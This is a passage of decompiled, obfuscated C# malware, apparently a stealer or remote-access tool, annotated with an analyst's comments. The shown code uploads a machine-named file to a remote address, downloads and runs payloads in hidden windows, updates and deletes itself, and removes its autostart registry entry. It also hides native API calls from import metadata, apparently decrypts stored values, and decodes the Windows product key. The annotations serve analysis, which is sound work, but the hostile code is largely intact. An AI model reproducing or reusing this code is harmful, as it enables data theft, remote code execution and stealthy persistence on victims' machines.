streamWriter.Write(\u003F1\u003F.\u003F1\u003F.\u003F178\u003F);
streamWriter.Close();
}
catch
{
}
try
{
ServicePointManager.Expect100Continue = false;
new WebClient().UploadFile(strArray[1], \u003F195\u003F.\u003F196\u003F("TŌɑ͕"), Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + Environment.MachineName + \u003F195\u003F.\u003F196\u003F("*ůɭͦ"));
}
catch
{
}
try
{
System.IO.File.Delete(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + Environment.MachineName + \u003F195\u003F.\u003F196\u003F("*ůɭͦ"));
}
catch
{
}
}
catch
{
}
}
// Handler 6: downloads the URL in field 1 to a file with a 12-character generated name
// (\u003F176\u003F.NextString, defined elsewhere) in the same environment-variable directory and
// starts it with a hidden window. Nothing about the downloaded content is checked.
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("nŦɿͩѧի٠ݦ\u087A।")))
{
try
{
string str = \u003F1\u003F.\u003F1\u003F.\u003F176\u003F.NextString(12) + \u003F195\u003F.\u003F196\u003F("*Ŧɺͤ");
new WebClient().DownloadFile(strArray[1], Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
}
// Handler 7: starts a process whose file name is field 1, with a hidden window.
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("sŭɰͫѵ")))
{
try
{
Process process = new Process()
{
StartInfo = new ProcessStartInfo(strArray[1])
};
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
}
catch
{
}
}
// Handler 8: same download-and-start sequence as handler 6, followed by writing a one-line
// script into the environment-variable directory, running it without a window and exiting
// the current process. The script line embeds the current executable's path and file name
// (presumably a self-delete script for the old copy - confirm).
if (_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("sŵɠ͢Ѷդ")))
{
try
{
string str = \u003F1\u003F.\u003F1\u003F.\u003F176\u003F.NextString(12) + \u003F195\u003F.\u003F196\u003F("*Ŧɺͤ");
new WebClient().DownloadFile(strArray[1], Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + str),
WindowStyle = ProcessWindowStyle.Hidden
}
}.Start();
}
catch
{
}
try
{
string str = \u003F195\u003F.\u003F196\u003F("6řɯ\u0379ѭզٲ\u070F\u0860੮ଡ") + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u003F195\u003F.\u003F196\u003F("\0Šɮ̧ѣս٭ݰ\u0876ड") + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u003F195\u003F.\u003F196\u003F(",Ŭɥͽѧԧٔݠ\u0874\u0A63\u0B75");
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ"));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ")),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
Environment.Exit(0);
}
// Handler 9 (removal). '&' binds tighter than '|', so the test reads
// (keyword matches AND field 1 == this machine's name) OR field 1 == the decoded literal.
// A command of any kind whose field 1 equals that literal therefore also reaches the removal
// code below. strArray[1] is read unconditionally; a command without '*' throws here and is
// swallowed by the outer catch.
if (!(_param0.StartsWith(\u003F195\u003F.\u003F196\u003F("tŠɩͬѴդ")) & strArray[1] == Environment.MachineName | strArray[1] == \u003F195\u003F.\u003F196\u003F("BŎɍ")))
return;
// Deletes one named value from the same decoded key path under HKLM or HKCU, chosen by the
// static flag \u003F167\u003F (presumably the sample's autostart entry - confirm).
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F167\u003F)
Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).DeleteValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"));
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).DeleteValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"));
}
catch
{
}
// Same script-write-and-run sequence as in handler 8, then the process exits.
try
{
string str = \u003F195\u003F.\u003F196\u003F("6řɯ\u0379ѭզٲ\u070F\u0860੮ଡ") + (object) '"' + Environment.GetCommandLineArgs()[0] + (object) '"' + \u003F195\u003F.\u003F196\u003F("\0Šɮ̧ѣս٭ݰ\u0876ड") + (object) '"' + Path.GetFileName(Application.ExecutablePath) + (object) '"' + \u003F195\u003F.\u003F196\u003F(",Ŭɥͽѧԧٔݠ\u0874\u0A63\u0B75");
TextWriter textWriter = (TextWriter) new StreamWriter(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ"));
textWriter.WriteLine(str);
textWriter.Close();
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("WŮɬͤѢղ٠ܪ\u0861ॣੵ")),
UseShellExecute = false,
CreateNoWindow = true
}
}.Start();
}
catch
{
}
Environment.Exit(0);
}
catch
{
}
}
// Analyst summary: wrapper that resolves one export from the library handle in \u003F173\u003F and
// calls it through the Cdecl delegate \u003F9\u003F with (long, bool, long), returning its result.
// The only caller in this chunk passes the value returned by \u003F43\u003F, true and 0, and
// ignores the result.
// NOTE(review): the export name is an obfuscated literal; the decoder is not shown here.
public static long \u003F42\u003F(long _param0, bool _param1, long _param2) => ((\u003F1\u003F.\u003F1\u003F.\u003F9\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("AśȾ̿ђՍپݾ\u0861७੩\u0B72౬൧\u0E62ྲྀၤ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F9\u003F)))(_param0, _param1, _param2);
// Analyst summary: wrapper that resolves one parameterless export from the library handle in
// \u003F173\u003F and calls it through the Cdecl delegate \u003F8\u003F. The returned long is used by the
// caller as the first argument of \u003F42\u003F, so it is presumably a native handle - unverified.
// NOTE(review): the export name is an obfuscated literal; the decoder is not shown here.
public static long \u003F43\u003F() => ((\u003F1\u003F.\u003F1\u003F.\u003F8\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("GŝȤ̥ьՕٴݤࡆॠ\u0A79୩\u0C79\u0D64\u0E68ཤ၌ᅣቼፗᕭᙵ")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F8\u003F)))();
// Analyst summary: wrapper that resolves one export from the library handle in \u003F173\u003F and
// calls it through the Cdecl delegate \u003F11\u003F.
//   _param0 - input structure (the caller passes the structure read from \u003F40\u003F's result).
//   _param1 - output structure; the caller reads its pointer and length fields afterwards.
//   _param2 - extra int argument; the caller passes 0.
// Returns the native result; the caller treats 0 as success.
// NOTE(review): the export name is an obfuscated literal; from the in/out structure pair this
// looks like the decrypt step for the stored values - confirm against the decoder.
public static int \u003F44\u003F(
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param0,
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param1,
int _param2)
{
return ((\u003F1\u003F.\u003F1\u003F.\u003F11\u003F) Marshal.GetDelegateForFunctionPointer(\u003F1\u003F.\u003F1\u003F.\u003F33\u003F(\u003F1\u003F.\u003F1\u003F.\u003F173\u003F, \u003F195\u003F.\u003F196\u003F("_Ņȼ̽јՎٛݗࡃॣ\u0B76\u0C7A\u0D72\u0E75")), typeof (\u003F1\u003F.\u003F1\u003F.\u003F11\u003F)))(ref _param0, ref _param1, _param2);
}
// Analyst summary: shows a modal message box with an OK button and the "Hand" (error) icon.
// Text and caption come from the static fields \u003F169\u003F and \u003F170\u003F, which are set outside
// this chunk; the dialog result is discarded. Presumably a decoy error shown to the user -
// unverified, the caller is not visible here.
public static void \u003F45\u003F()
{
int num = (int) MessageBox.Show(\u003F1\u003F.\u003F1\u003F.\u003F169\u003F, \u003F1\u003F.\u003F1\u003F.\u003F170\u003F, MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
// Delegate types used to call native exports resolved at run time (no DllImport, so the
// export names do not appear in the assembly's import metadata). All use the Cdecl convention.
// Signature for the export called by \u003F39\u003F: one string argument, long result.
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate long \u003F7\u003F(string _param1);
// Signature for the export called by \u003F43\u003F: no arguments, long result.
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate long \u003F8\u003F();
// Signature for the export called by \u003F42\u003F: (long, bool, long), long result.
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate long \u003F9\u003F(long _param1, bool _param2, long _param3);
// Signature for the export called by \u003F40\u003F: two pointers, a text buffer and its length.
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int \u003F10\u003F(
IntPtr _param1,
IntPtr _param2,
StringBuilder _param3,
int _param4);
// Signature for the export called by \u003F44\u003F: input structure, output structure, int.
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
public delegate int \u003F11\u003F(
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param1,
ref \u003F1\u003F.\u003F1\u003F.\u003F13\u003F _param2,
int _param3);
// Helper class holding one static converter from a binary blob to a dash-separated text key.
public class \u003F12\u003F
{
// Analyst summary: takes bytes 52..67 of _param0, treats the first 15 of them as one
// little-endian number and writes it out in base 24 using the alphabet below, producing a
// 29-character string of five 5-character groups separated by '-'.
//   _param0 - binary blob; it must be at least 68 bytes long or the first loop throws
//             (the caller in this chunk wraps the call in an empty catch).
// Returns the formatted 29-character string.
// NOTE(review): offset 52, the 24-symbol alphabet and the 5x5 layout match the widely
// published decoding of the Windows product key from the DigitalProductId registry value;
// the caller passes a binary HKLM registry value, but its name is obfuscated - confirm.
public static string \u003F46\u003F(byte[] _param0)
{
// Digit alphabet for base 24.
char[] chArray1 = new char[24]
{
'B',
'C',
'D',
'F',
'G',
'H',
'J',
'K',
'M',
'P',
'Q',
'R',
'T',
'V',
'W',
'X',
'Y',
'2',
'3',
'4',
'6',
'7',
'8',
'9'
};
char[] chArray2 = new char[29];
ArrayList arrayList = new ArrayList();
// Copies 16 bytes (offsets 52..67); only the first 15 are used by the division below.
for (int index = 52; index <= 67; ++index)
arrayList.Add((object) _param0[index]);
// Output is filled from the last character to the first.
for (int index1 = 28; index1 >= 0; --index1)
{
// Positions 5, 11, 17 and 23 hold the separators; every other position is one digit.
if ((index1 + 1) % 6 != 0)
{
int index2 = 0;
// One step of long division by 24 over the 15-byte number, most significant byte first:
// each byte is replaced by its quotient and the running remainder is carried down.
for (int index3 = 14; index3 >= 0; --index3)
{
int num = index2 << 8 | (int) (byte) arrayList[index3];
arrayList[index3] = (object) (byte) (num / 24);
index2 = num % 24;
// Overwritten on every pass; the value left after the last byte is the final remainder.
chArray2[index1] = chArray1[index2];
}
continue;
}
chArray2[index1] = '-';
}
return new string(chArray2);
}
}
// Three-int structure marshalled to and from native code by \u003F40\u003F and \u003F44\u003F.
// The dispatcher reads \u003F181\u003F as the address of a native buffer and \u003F182\u003F as its
// length in bytes; \u003F180\u003F is not read in this chunk.
// NOTE(review): the layout resembles a (type, data pointer, length) item descriptor - an
// assumption. The pointer is stored in an int, which only fits a 32-bit process.
public struct \u003F13\u003F
{
public int \u003F180\u003F;
// Used by the caller as a pointer (wrapped in IntPtr before Marshal.Copy).
public int \u003F181\u003F;
// Used by the caller as the byte count to copy.
public int \u003F182\u003F;
}
}
}